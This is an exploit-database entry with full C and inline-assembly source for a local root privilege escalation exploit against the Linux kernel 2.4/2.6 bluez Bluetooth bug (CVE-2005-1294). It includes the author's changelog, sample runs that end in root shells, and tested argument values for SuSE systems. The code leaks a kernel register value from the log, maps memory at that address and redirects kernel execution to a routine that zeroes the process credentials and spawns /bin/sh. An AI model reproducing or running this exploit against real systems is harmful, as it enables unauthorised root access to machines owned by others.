Linux Kernel 2.4/2.6 - bluez Local Root Privilege Escalation Exploit (Update 3)



EDB-ID: 926 CVE: 2005-1294 OSVDB-ID: 15783
Author: qobaiashi Published: 2005-10-26 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
/*

Due to many responses i've improved the exploit
to cover more systems!


  ONG_BAK v0.9   [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use all possible memory regions
o bugfixes

qobaiashi@voyager:~/w00nf/kernelsploit> ./ong_bak -100222
-|-bluez local root exploit v.0.9  -by qobaiashi-
 |
 |- i've found kernel 2.6.11.4-20a-default
 |- trampoline is at 0x804869c
 |- trying...
 |- [ecx: bf8d0000 ]
 |- suitable value found!using 0xbf8d0000
 |- the time has come to push the button...
sh-3.00# exit






  ONG_BAK v0.3   [april 8th 05]
"""""""""""""""""""""""""""""""""
ong_bak now checks the value of ecx and launches
the exploit in case a suitable value has been found!



  ONG_BAK v0.1   [april 4th 05]
"""""""""""""""""""""""""""""""""

local root exploit for the bluetooth bug

usage:

the bug is quite stable so you can't realy fuck things up
if you stick to the following:

play around with the negative argument until ecx points to 
our data segment:


qobaiashi@voyager:~> ./ong_bak -1002341
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i've found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0b8f0f0f ]
qobaiashi@voyager:~> ./ong_bak -10023411
-|-local bluez exploit v.0.3  -by qobaiashi-
 |
 |- i've found kernel 2.6.4-52-default
 |- trying...
 |- [ecx: 0809da40 ]
 |- suitable value found!using 0x0809da40
 |- the time has come to push the button..
qobaiashi@voyager:~> id
uid=0(root) gid=0(root) Gruppen=14(uucp),16(dialout),17(audio),33(video),100(users)
qobaiashi@voyager:~>



that's it.
unfortunately it's not yet very practicable..

qobaiashi@u-n-f.com

*/

#include <sys/klog.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <sys/utsname.h>
#include <sys/mman.h>


void usage(char *path);

//===================[ kernel 2.6* privilege elevator ]===============================
//===================[      qobaiashi@u-n-f.com       ]===============================
//globals
int uid, gid;

extern load_highlevel;
__asm__
(
"load_highlevel:         \n"
"xor    %eax, %eax       \n"
"mov    $0xffffe000, %eax\n"
"and    %esp,%eax        \n"
"pushl  %eax             \n"
"call   set_root         \n"
"pop    %eax             \n"
//ret to userspace-2.6.* version
" cli                    \n"
" pushl $0x7b            \n"      //DS user selector
" pop   %ds              \n"
" pushl %ds              \n"      //SS
" pushl $0xc0000000      \n"      //ESP
" pushl $0x246           \n"      //EFLAGS
" pushl $0x73            \n"      //CS user selector
" pushl $shellcode       \n"      //EIP must not be a push /bin/sh shellcode!!
"iret                    \n"
);

void set_root(unsigned int *ts)
{
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
    if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
      ts[0] = ts[1] = ts[4] = ts[5] = 0;

}


void shellcode()
{
system("/bin/sh");
exit(0);
}
//====================================================================================
//====================================================================================





main(int argc, char *argv[])
{
char buf[2048];
int sock, *mod = (int*)buf;
int *linker = 0;

unsigned int arg;
int tmp;
char *check;
struct utsname vers;

gid  = getgid();
uid  = getuid();

printf("-|-bluez local root exploit v.0.9  -by qobaiashi-\n |\n");
if (uname(&vers) < 0)
   printf(" |- couldn't determine kernel version\n");

else
    printf(" |- i've found kernel %s\n", vers.release);
    

printf(" |- trampoline is at %p\n", &load_highlevel);


if (argc < 2)
   {
    usage(argv[0]);
    exit(1);
    }

if (argc == 2)
    arg = strtoul(argv[1], 0, 0);


if (fork() != 0)//parent watch the Oops
   {
    //previous Oops printing
   usleep(1000);
   if ((tmp = klogctl(0x3, buf, 1700)) > -1)
       {
        check = strstr(buf, "ecx: ");
        printf(" |- [%0.14s]\n", check);
        check+=5;
        *(check+9) = 0x00;*(--check) = 'x';*(--check) = '0';
        mod = (unsigned int*)strtoul(check, 0, 0);
        //page align FIXME: might be booggy
        int *ecx = mod;
        mod = (int)mod &~ 0x00000fff;
        linker = 
mmap((void*)mod,0x2000,PROT_WRITE|PROT_READ,MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED,0,0);
        if(linker == mod)//we could mmap the area
          {
           printf(" |- suitable value found!using %p\n", mod);
           printf(" |- the time has come to push the button... \n");
           for (sock = 0;sock <= 1;sock++)          //use ecx
                *(ecx++) = (int)&load_highlevel;   //link to shellcode
           }

           else 
             {
              printf(" |- could not mmap   %p\n", mod);
              if( brk((void*)mod+0x200 ) == -1)
                {
                 printf(" |- could not brk to %p\n", mod);
                 printf(" `-------------------------------\n");
                 exit(-1);
                 }
              //here we did it
              printf(" |- suitable value found!using %p\n", mod);
              printf(" |- the time has come to push the button... \n");
              for (sock = 0;sock <= 1;sock++)          //use ecx
                  *(ecx++) = (int)&load_highlevel;    //link to shellcode

              }
           if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
               exit(1);
                               
        }
   return 0;
   }

if (fork() == 0)//child does the pre-exploit
{
  printf(" |- trying...\n");
  if ((sock = socket(AF_BLUETOOTH, SOCK_RAW, arg)) < 0)
      {
      printf(" |- something went w0rng (invalid value)\n");
      exit(1);
     }
}

exit(0);
}



/*****************\
|**    usage    **|
\*****************/
void usage(char *path)
{
printf(" |----------------------------\n");
printf(" | usage: %s <negative value> \n", path);
printf(" | tested:\n");
printf(" | SuSE 9.1:      -10023411  \n");
printf(" |                -41122122 \n");
printf(" | Kernel 2.6.11: -10023 \n");
printf(" | SuSE 9.3:      -100222\n");
printf(" |                -102901\n");
printf(" `-----------------------\n");
exit(0);
}

// 1st post: milw0rm.com [2005-04-09]

// milw0rm.com [2005-10-26]